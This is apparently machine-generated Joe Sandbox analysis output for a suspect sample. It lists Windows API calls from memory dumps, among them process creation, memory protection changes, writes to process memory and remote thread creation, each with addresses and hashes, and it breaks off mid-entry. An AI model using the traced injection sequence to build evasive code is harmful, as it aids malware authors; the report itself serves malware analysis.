                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,FFFFA50C,FFFFBE18), ref: 0086CADD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: BIA5$S$_R$jjjj
                                                                          • API String ID: 963392458-1667598387
                                                                          • Opcode ID: f2a207d2bc7a3463ab79eb200694f30c31d60b846750a6586b60a605faba2795
                                                                          • Instruction ID: 2ba1a149b6c9489e622110a52d0764ff09bd9d228a1ca0ca0f2b8a0f11b3d330
                                                                          • Opcode Fuzzy Hash: f2a207d2bc7a3463ab79eb200694f30c31d60b846750a6586b60a605faba2795
                                                                          • Instruction Fuzzy Hash: BF22CDB1D052688BE724CA18DC94BFABBB5FB84314F1580FAD80DA6281D6789FC5CF51
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,FFFFA50C,FFFFBE18), ref: 0086CADD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: _R$jjjj
                                                                          • API String ID: 963392458-548377202
                                                                          • Opcode ID: e017325d12036dbbd3944ddf0c3b731a19a9bf8e4f2fff77fedcf34077eea285
                                                                          • Instruction ID: b0795cab04c60f4fdadd912ad442aaacc00afa9d3a3c83824c057ddb2c48eed3
                                                                          • Opcode Fuzzy Hash: e017325d12036dbbd3944ddf0c3b731a19a9bf8e4f2fff77fedcf34077eea285
                                                                          • Instruction Fuzzy Hash: B7B1F4B1C082689AE7248B24DC55BFA7B75FF40304F1480FAD54DAA281D7B99FC5CB62
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 70558449dd412dc78808ade63492eeecc943651df1192703e8e7efd653501b87
                                                                          • Instruction ID: 7467057c6162e8804b48c30bd14e013696420b760a3d49d7e969b162e4bdc023
                                                                          • Opcode Fuzzy Hash: 70558449dd412dc78808ade63492eeecc943651df1192703e8e7efd653501b87
                                                                          • Instruction Fuzzy Hash: 93A1BCB2D056289FEB24CB24DC94BEAB775FF95304F0441EAD90DA7242E2386E81CF51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 7cad0540644da736d243623231e42aece3b0ce2fdbc1ef9ffcd7dc49601bdafc
                                                                          • Instruction ID: b699c24826a4d4831d75c3d0fca7a82fb4e13edd9c0034e2a290b87d83477a56
                                                                          • Opcode Fuzzy Hash: 7cad0540644da736d243623231e42aece3b0ce2fdbc1ef9ffcd7dc49601bdafc
                                                                          • Instruction Fuzzy Hash: 31818BB2D056289FEB24CB24DC94BEAB775FF94314F0441FAD90DA7242E2386E81CE51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Q$XP
                                                                          • API String ID: 544645111-2747523662
                                                                          • Opcode ID: 7bc996bb8df4d489862fbd5fac89f21935b22adf558600a3d5d41489ae772920
                                                                          • Instruction ID: 05c0c9e0f39500b98786ba67085e0aaa06051ba62e6c87fd965690a4387135da
                                                                          • Opcode Fuzzy Hash: 7bc996bb8df4d489862fbd5fac89f21935b22adf558600a3d5d41489ae772920
                                                                          • Instruction Fuzzy Hash: 44819AB1D045289FEB248B24DC94BFEB7B5FB94314F1441EAD54DA6282E2386FC1CE51
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: f49aff1e640fc6b1072ccf9e1fca8caad84507267c5e72b2b33860e61ed57aa9
                                                                          • Instruction ID: d53411b0ea51dee6c7d1ac5f846b7fb9984a56cb333d607b5a31238054888940
                                                                          • Opcode Fuzzy Hash: f49aff1e640fc6b1072ccf9e1fca8caad84507267c5e72b2b33860e61ed57aa9
                                                                          • Instruction Fuzzy Hash: E832AFB1D042689BEB24CA14DC94BEABBB5FB84314F1481FAD80DA7284D7789FC58F51
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: 9MM;
                                                                          • API String ID: 1286204186-553234120
                                                                          • Opcode ID: 935a91fda874f28430492afdf049620dbc9ddad10085fd2f00c6484e33508723
                                                                          • Instruction ID: 06b3972debb2dee45c8f3756cd67d66ee5e8f0b69de40be7acfe6b8d823966a9
                                                                          • Opcode Fuzzy Hash: 935a91fda874f28430492afdf049620dbc9ddad10085fd2f00c6484e33508723
                                                                          • Instruction Fuzzy Hash: 4E02DFB1E052288BEB24CB14DD94BEAB7B5FB94314F1541FAD809A7682D7346EC1CE41
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: 6d519a2b5ef6682f30ae0462319750a90020486a894047eacf15c89af8cc3552
                                                                          • Instruction ID: fa0068836e08d77e83f187631d2acc6ea6fd5028955b60203f281d4827c88bea
                                                                          • Opcode Fuzzy Hash: 6d519a2b5ef6682f30ae0462319750a90020486a894047eacf15c89af8cc3552
                                                                          • Instruction Fuzzy Hash: DFF188B1D042688BEB24CB14CC94BEABBB5FF84304F1481EAD84DA6285D3799EC5CF51
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: XV
                                                                          • API String ID: 1286204186-401391866
                                                                          • Opcode ID: bfcd213b807e97697272511212d60eb3699ab484138a4cd5654ef7a391bbb502
                                                                          • Instruction ID: 7bd975d46a0de3b4cde1e71f03168985cab540eb4d2cd05f08b16cddd750230e
                                                                          • Opcode Fuzzy Hash: bfcd213b807e97697272511212d60eb3699ab484138a4cd5654ef7a391bbb502
                                                                          • Instruction Fuzzy Hash: 35F136B5E052288BEB24CB14DC90AEAB7B5FB95305F1581EAD80DA7381D6786EC1CF41
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 008798CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID: _R
                                                                          • API String ID: 3559483778-4285093506
                                                                          • Opcode ID: 2fdb0802036ed56a4d0e4690acf272cc3f133b738b92784ca720a60125838a7f
                                                                          • Instruction ID: d1df62edfdc99af24421cdee8f2df71cb13437cb10f9467886ddf56bc7b2b780
                                                                          • Opcode Fuzzy Hash: 2fdb0802036ed56a4d0e4690acf272cc3f133b738b92784ca720a60125838a7f
                                                                          • Instruction Fuzzy Hash: 97B1F5B1D082689AE7208B24CC847EAB7B5FF81314F1481EAD44DA6645D6789FC5CF62
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: 3459c553f2af762e72e0d7c03abe189faefa102aae1a7fbea3801c0beab857a9
                                                                          • Instruction ID: fac64e50b6dd434385656065ec77d9244cb25fe54b4ed9fd78ed91d8b008f65d
                                                                          • Opcode Fuzzy Hash: 3459c553f2af762e72e0d7c03abe189faefa102aae1a7fbea3801c0beab857a9
                                                                          • Instruction Fuzzy Hash: 0AB1E4B1C082689BDB208B24CC94BEABBB5FF40304F1481EAD44DA6285E7798FC5CF51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 6
                                                                          • API String ID: 544645111-498629140
                                                                          • Opcode ID: 21e145b9d01d0429d681cef96d68f8ddd4dd59dc6755a6771de829f119c38e8d
                                                                          • Instruction ID: bae948e39814d16321d524a3ff01917d5c3a3f21a29f9cababf8c07221ef7607
                                                                          • Opcode Fuzzy Hash: 21e145b9d01d0429d681cef96d68f8ddd4dd59dc6755a6771de829f119c38e8d
                                                                          • Instruction Fuzzy Hash: C9B17EB1E441299FEB28CB14CC94BEAB775FB85314F1841FAD50EA6640D7789EC0CE82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 61165d2f762cb19fdab78447826a224234b42124714635585f106bceac67785d
                                                                          • Instruction ID: 91c818aab94d8dc986773f2af93743516f3e130c2c6bcd75ebe55b6b7290dba7
                                                                          • Opcode Fuzzy Hash: 61165d2f762cb19fdab78447826a224234b42124714635585f106bceac67785d
                                                                          • Instruction Fuzzy Hash: E29128B1D08298AFE7258A24DC95BFA7B78EF41304F1881FED80DA6245D2799FC48F11
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: GOI7
                                                                          • API String ID: 1286204186-3309773862
                                                                          • Opcode ID: 05014760f509d448bb701bb4e629044328589c276fd667273f425caefc7aa39b
                                                                          • Instruction ID: 912582230639a1f14164e3dc0457f1922141a49261f53d172d17c6e55748c125
                                                                          • Opcode Fuzzy Hash: 05014760f509d448bb701bb4e629044328589c276fd667273f425caefc7aa39b
                                                                          • Instruction Fuzzy Hash: 2F91ACB1E042288FEB248B14DC907EAB7B5FB98314F1581FAE94DA6640E7385EC1CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 919e1e6ac23e43c94098daca132517e119caa9a7c39ac7508367a69e539b8994
                                                                          • Instruction ID: b4b8ac2dd024ad6ef792d4e642dcc712c4913ae828c506385ada4454124cec0f
                                                                          • Opcode Fuzzy Hash: 919e1e6ac23e43c94098daca132517e119caa9a7c39ac7508367a69e539b8994
                                                                          • Instruction Fuzzy Hash: CD71D2B1D0865CAFEB20CB24DC94BFE77B5EB85314F1481FAD40D9A281D6386EC18E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 6b0cdf830fb9954076793573a4b5185365979ae5d9bd51777d8227aa2393c962
                                                                          • Instruction ID: 84b010ffaabe3b7a149113db71f228643f7ed8ed82397708bab65f2a457a9cd3
                                                                          • Opcode Fuzzy Hash: 6b0cdf830fb9954076793573a4b5185365979ae5d9bd51777d8227aa2393c962
                                                                          • Instruction Fuzzy Hash: AF61E5B1D082A88BEB25CA14DC94BEA7BB5FF41304F1480FAD40DA6245D2799FC5CF52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 6edaee10a2d21486d7aa30f8abcb64db26210d5603151562c9474f5cbc4b2043
                                                                          • Instruction ID: fc2f8b6652fca807320317afac019d968133239e59117a7a9bb66750756f693b
                                                                          • Opcode Fuzzy Hash: 6edaee10a2d21486d7aa30f8abcb64db26210d5603151562c9474f5cbc4b2043
                                                                          • Instruction Fuzzy Hash: 4D6189B2D05528AFEB248B24DC54BEAB7B5FF95314F0441FAD50DA7282E2386EC1CE51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 079fecb0d6cba55605babc8f391f3485fa27fdac245c01cb71d80f01df6396dd
                                                                          • Instruction ID: f2e9958c2bfa658b5934998c066037778631b4998de57428eb7fc22b1a92b572
                                                                          • Opcode Fuzzy Hash: 079fecb0d6cba55605babc8f391f3485fa27fdac245c01cb71d80f01df6396dd
                                                                          • Instruction Fuzzy Hash: E851B2B2D0865C9FEB20CB24DC54BEE77B5EB99314F1481FAD40D9B281D6386EC18E51
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: b7036088fc8e7b474e4372e2c50a0aecfe1e7d76a0358baf24cc265396a6b2e3
                                                                          • Instruction ID: c21322d9141f1eef9d89f79271626f1a094893d6f287747cd8d573e92283efd1
                                                                          • Opcode Fuzzy Hash: b7036088fc8e7b474e4372e2c50a0aecfe1e7d76a0358baf24cc265396a6b2e3
                                                                          • Instruction Fuzzy Hash: E25107B1C083989FE7208A24DC84BAABB78FF50304F1481FAD40DA6285D2B9DFC58F51
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID: C6=9
                                                                          • API String ID: 2949231068-3186520411
                                                                          • Opcode ID: 655e84608381e51a0caa5ec39fc6e1d5f9c44a2a126ebdf060c0c5f92b66be3a
                                                                          • Instruction ID: b4634b44c4162d9e2c1e11cc994e62421d309efd48b7c49529d33c35b68efcee
                                                                          • Opcode Fuzzy Hash: 655e84608381e51a0caa5ec39fc6e1d5f9c44a2a126ebdf060c0c5f92b66be3a
                                                                          • Instruction Fuzzy Hash: 9151DFB1D182649BE7249A60DC40BEB7675EF94300F0040FED80E97382E7799EC28B66
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: _R
                                                                          • API String ID: 2422867632-4285093506
                                                                          • Opcode ID: a17b0cef26c7dfbe8c48afc40c45fef1140929c4e636bf6ecb14d8c459b24b81
                                                                          • Instruction ID: 5480ae197d15350b82886e6ea1d5655428e1ad7b89e35fe9bdbe94f97c993e64
                                                                          • Opcode Fuzzy Hash: a17b0cef26c7dfbe8c48afc40c45fef1140929c4e636bf6ecb14d8c459b24b81
                                                                          • Instruction Fuzzy Hash: 954126B1D0C2D89FE7218624CC85BEABB78EF51304F1480FAD00D66282C6B9DFC58B52
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,000002CC,00001000,00000004), ref: 0086F316
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: _R
                                                                          • API String ID: 4275171209-4285093506
                                                                          • Opcode ID: cf08968b933e7666edf727862540d82722d60700e4eb354c951b404e6b6bcbc1
                                                                          • Instruction ID: bf0cd995e4e45cbb002618cdcc38b5f52e1d2518cc27e259f4758570a96470e0
                                                                          • Opcode Fuzzy Hash: cf08968b933e7666edf727862540d82722d60700e4eb354c951b404e6b6bcbc1
                                                                          • Instruction Fuzzy Hash: 6422EDB5C042688BEB24CB24DC84BEAB7B5FF94314F1581FAD80DA6281D6789EC5CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: b8ab5a504119f3c636051153b3abdc1394626b4fe3640cd922b00cfe21d352fb
                                                                          • Instruction ID: 1b22006e3342253358a49cdefdce94861f741773f8ab99752c6dcb900aa4113a
                                                                          • Opcode Fuzzy Hash: b8ab5a504119f3c636051153b3abdc1394626b4fe3640cd922b00cfe21d352fb
                                                                          • Instruction Fuzzy Hash: 5A8149B1C082A88AEB248624DC95BFF7B74FF51314F1841FAD40EA6281D6799FC18F52
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 2EDF
                                                                          • API String ID: 1263568516-111005369
                                                                          • Opcode ID: 1275051a707cd4002b55b038cb87d868e9573443ac0623367963d5eb72378b16
                                                                          • Instruction ID: a65eedc2822d2dad9aa0701cecb7fd2e455ddd81da3845e8c8af98ebc385f65c
                                                                          • Opcode Fuzzy Hash: 1275051a707cd4002b55b038cb87d868e9573443ac0623367963d5eb72378b16
                                                                          • Instruction Fuzzy Hash: 2561C5B2E006289BE7248B64DC54BEBB775FF84311F1051F9D90DA7280D678AEC18F51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 2EDF
                                                                          • API String ID: 1263568516-111005369
                                                                          • Opcode ID: 2e15b9c31f82210083d9cb99c3ec42944a89de856c63a32077643b1cb1d0b2a2
                                                                          • Instruction ID: 5dfa6837ad5a7143f38747989c2249579162ec40666c457d3f41634eda33397b
                                                                          • Opcode Fuzzy Hash: 2e15b9c31f82210083d9cb99c3ec42944a89de856c63a32077643b1cb1d0b2a2
                                                                          • Instruction Fuzzy Hash: 7051D1A2E016189AEB248B65DC54BEBB775FFC4311F1081F9E50DA7280E6789AC18F51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
                                                                          • Opcode ID: 5fa4d89a89611d2b71b1a4819d1e532aa0473781fe3b7d15c586322590a0c127
                                                                          • Instruction ID: 6302b9cb41290a411ccdb512b10137fe499a106ea70a039b8a3df0038ebec71f
                                                                          • Opcode Fuzzy Hash: 5fa4d89a89611d2b71b1a4819d1e532aa0473781fe3b7d15c586322590a0c127
                                                                          • Instruction Fuzzy Hash: C2F1BFB1D041688FE724CB14CC94BAABBB6FF91318F1481EAD94DA6245D7389FC18F42
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
                                                                          • Opcode ID: 55985e206bfc0ab8e65a1af142fcae8adabb03649b6278b40506864bd8b521af
                                                                          • Instruction ID: ba45a05d2a30f870e35e0d919e71ca49be148b13dc0d4d89b02a0f9eae912a30
                                                                          • Opcode Fuzzy Hash: 55985e206bfc0ab8e65a1af142fcae8adabb03649b6278b40506864bd8b521af
                                                                          • Instruction Fuzzy Hash: 6EA1E1B1D081599FE7248B14DC44BEABBB5FF90314F1480FAD40DA6245E7789EC58F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
                                                                          • Opcode ID: 51f1c118715c63727899fcdf615c1de0fdf85c5773f403c6f2e856e2734e878c
                                                                          • Instruction ID: 7288ba8de120504b0b2fb217294a2d706369d4ed7fea6e8d2add1fc3df101092
                                                                          • Opcode Fuzzy Hash: 51f1c118715c63727899fcdf615c1de0fdf85c5773f403c6f2e856e2734e878c
                                                                          • Instruction Fuzzy Hash: 2491D3B1D082A89EEB208B24CC447EA7BB5FF91314F1480FAD44DA6245D7789FC58F52
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: dd0959d3ac9439c6e66a1398d537d11a50fca2fa231a72a5e0f29d4380da5fc4
                                                                          • Instruction ID: 5cff7e20590e96420e9e837944efece030117bdd8532d668de264777dee9246d
                                                                          • Opcode Fuzzy Hash: dd0959d3ac9439c6e66a1398d537d11a50fca2fa231a72a5e0f29d4380da5fc4
                                                                          • Instruction Fuzzy Hash: 76E17AB5D042288BEB24CE25CC90BEAB7B5EF94305F1441EAD40DA7281E739AED18F55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c14029486e0011a938abf89c52cd395a291440da30a797f13b8f33d676c3cde2
                                                                          • Instruction ID: 2358311fb1116000c043c7d0191ce8fa760988359e5e4b2c8a32969a1d34f9f6
